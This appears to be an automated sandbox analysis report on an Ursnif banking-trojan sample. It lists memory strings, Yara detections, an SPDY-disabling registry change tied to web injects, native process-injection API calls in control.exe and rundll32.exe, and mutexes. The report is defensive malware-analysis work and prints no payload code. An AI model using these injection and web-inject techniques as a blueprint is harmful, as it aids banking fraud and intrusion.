Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
Source: RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Contains functionality to call native functions

Source: C:\Windows\System32\control.exe	Code function: 25_2_00B83830 NtWriteVirtualMemory,	25_2_00B83830
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8387C NtCreateSection,	25_2_00B8387C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7BAB4 NtAllocateVirtualMemory,	25_2_00B7BAB4
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B81AC4 NtQueryInformationProcess,	25_2_00B81AC4
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7CCA0 NtReadVirtualMemory,	25_2_00B7CCA0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9ADD4 NtQueryInformationProcess,	25_2_00B9ADD4
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8F560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	25_2_00B8F560
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9F7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,	25_2_00B9F7EC
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8FFCC NtMapViewOfSection,	25_2_00B8FFCC
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	25_2_00B9676C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00BB1002 NtProtectVirtualMemory,NtProtectVirtualMemory,	25_2_00BB1002
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,	39_2_0000027FF74EF7EC
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D1AC4 NtQueryInformationProcess,	39_2_0000027FF74D1AC4
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF7501002 NtProtectVirtualMemory,NtProtectVirtualMemory,	39_2_0000027FF7501002

Detected potential crypto function

Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9C164	25_2_00B9C164
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9A4BC	25_2_00B9A4BC
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9676C	25_2_00B9676C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9E080	25_2_00B9E080
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B920F8	25_2_00B920F8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7203C	25_2_00B7203C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B90034	25_2_00B90034
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B96064	25_2_00B96064
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8B040	25_2_00B8B040
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B991A0	25_2_00B991A0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B89138	25_2_00B89138
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7C134	25_2_00B7C134
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B81174	25_2_00B81174
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9F940	25_2_00B9F940
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B98224	25_2_00B98224
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B93208	25_2_00B93208
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B89380	25_2_00B89380
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B72BC8	25_2_00B72BC8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B77320	25_2_00B77320
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B78B5C	25_2_00B78B5C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B994B8	25_2_00B994B8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B89CB0	25_2_00B89CB0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8D4A8	25_2_00B8D4A8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7BCF8	25_2_00B7BCF8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B83CE0	25_2_00B83CE0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B974CC	25_2_00B974CC
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B80CC0	25_2_00B80CC0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7D460	25_2_00B7D460
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B81D94	25_2_00B81D94
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8452C	25_2_00B8452C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8B520	25_2_00B8B520
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9B516	25_2_00B9B516
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B76D08	25_2_00B76D08
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9BEB0	25_2_00B9BEB0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B926B4	25_2_00B926B4
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7AE04	25_2_00B7AE04
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B817B8	25_2_00B817B8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9AFB8	25_2_00B9AFB8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B737B8	25_2_00B737B8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B79F98	25_2_00B79F98
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8F770	25_2_00B8F770
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7B75C	25_2_00B7B75C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EC164	39_2_0000027FF74EC164
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EA4BC	39_2_0000027FF74EA4BC
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E3208	39_2_0000027FF74E3208
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E91A0	39_2_0000027FF74E91A0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E8224	39_2_0000027FF74E8224
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E20F8	39_2_0000027FF74E20F8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D1174	39_2_0000027FF74D1174
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D9138	39_2_0000027FF74D9138
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CC134	39_2_0000027FF74CC134
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EF940	39_2_0000027FF74EF940
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D17B8	39_2_0000027FF74D17B8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C37B8	39_2_0000027FF74C37B8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EAFB8	39_2_0000027FF74EAFB8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E6064	39_2_0000027FF74E6064
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EE080	39_2_0000027FF74EE080
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C203C	39_2_0000027FF74C203C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E0034	39_2_0000027FF74E0034
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74DB040	39_2_0000027FF74DB040
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E26B4	39_2_0000027FF74E26B4
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EBEB0	39_2_0000027FF74EBEB0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E676C	39_2_0000027FF74E676C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74DF770	39_2_0000027FF74DF770
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C9F98	39_2_0000027FF74C9F98
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CB75C	39_2_0000027FF74CB75C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CAE04	39_2_0000027FF74CAE04
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D3CE0	39_2_0000027FF74D3CE0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CBCF8	39_2_0000027FF74CBCF8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C6D08	39_2_0000027FF74C6D08
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EB516	39_2_0000027FF74EB516
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74DD4A8	39_2_0000027FF74DD4A8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E94B8	39_2_0000027FF74E94B8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D9CB0	39_2_0000027FF74D9CB0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E74CC	39_2_0000027FF74E74CC
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D0CC0	39_2_0000027FF74D0CC0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D1D94	39_2_0000027FF74D1D94
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D452C	39_2_0000027FF74D452C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74DB520	39_2_0000027FF74DB520
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C2BC8	39_2_0000027FF74C2BC8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CD460	39_2_0000027FF74CD460
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D9380	39_2_0000027FF74D9380
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C7320	39_2_0000027FF74C7320
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D8B4C	39_2_0000027FF74D8B4C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C8B5C	39_2_0000027FF74C8B5C

Java / VBScript file with very long strings (likely obfuscated code)

Source: 2Q4tLHa5wbO1.vbs

Initial sample: Strings found which are bigger than 50

PE file does not import any functions

Source: 5b2bnkld.dll.21.dr	Static PE information: No import functions for PE file found
Source: ztp4fhzn.dll.24.dr	Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{523EEBAD-89C9-54C5-A3A6-CDC8873A517C}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{DE7DF658-A5CB-C008-1FF2-A9F4C346ED68}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_01
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{42CF918A-B9C5-C4B3-5396-FD38372A81EC}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
